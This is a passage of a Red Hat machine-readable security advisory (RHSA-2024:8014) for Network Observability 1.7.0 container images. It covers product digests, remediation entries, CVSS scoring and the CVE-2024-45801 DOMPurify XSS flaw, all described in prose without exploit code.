"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
},
{
"cve": "CVE-2024-45801",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-16T19:20:09.863249+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2312631"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "dompurify: XSS vulnerability via prototype pollution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45801"
},
{
"category": "external",
"summary": "RHBZ#2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21",
"url": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc",
"url": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674",
"url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674"
}
],
"release_date": "2024-09-16T19:16:11.080000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
